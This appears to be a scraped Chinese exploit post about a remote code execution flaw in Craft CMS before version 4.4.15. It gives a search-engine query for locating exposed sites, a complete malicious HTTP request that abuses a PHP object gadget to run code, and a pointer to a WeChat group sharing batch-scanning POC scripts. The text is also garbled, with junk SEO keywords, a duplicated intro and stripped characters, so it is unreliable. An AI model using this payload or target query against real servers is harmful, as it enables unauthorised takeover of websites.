做网站 挣广告联盟的佣金,可以入侵的网站,网站建设技术网站建设,做湲兔费网站视颍0x01 产品简介
Crat CMS是一个开源的内容管理系统#xff0c;它专注于用户友好的内容创建过程#xff0c;逻辑清晰明了#xff0c;是一个高度自由#xff0c;高度自定义设计的平台#xff0c;可以用来创建个人或企业网站也可以搭建企业级电子商务系统。
0x02 漏洞概述
…0x01 产品简介
Crat CMS是一个开源的内容管理系统它专注于用户友好的内容创建过程逻辑清晰明了是一个高度自由高度自定义设计的平台可以用来创建个人或企业网站也可以搭建企业级电子商务系统。
0x02 漏洞概述
Craft CMS在4.4.15版本之前存在远程代码执行漏洞攻击者可构造恶意请求执行任意代码控制服务器。
0x03 搜索语法
titleWelcome to Craft CMS || headerX-Powered-By: Craft CMS0x04 漏洞复现
POST /ConditionsController.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflateactionconditions/rendertest[userCondition]craft\elements\conditions\users\UserConditionconfig{name:test[userCondition],as xyz:{class:\\GuzzleHttp\\Psr7\\FnStream, __construct(): [{close:null}],_fn_close:phpinfo}}0x05 工具批量
nuclei afrog xray POC脚本获取
请使用VX扫一扫加入内部POC脚本分享圈子
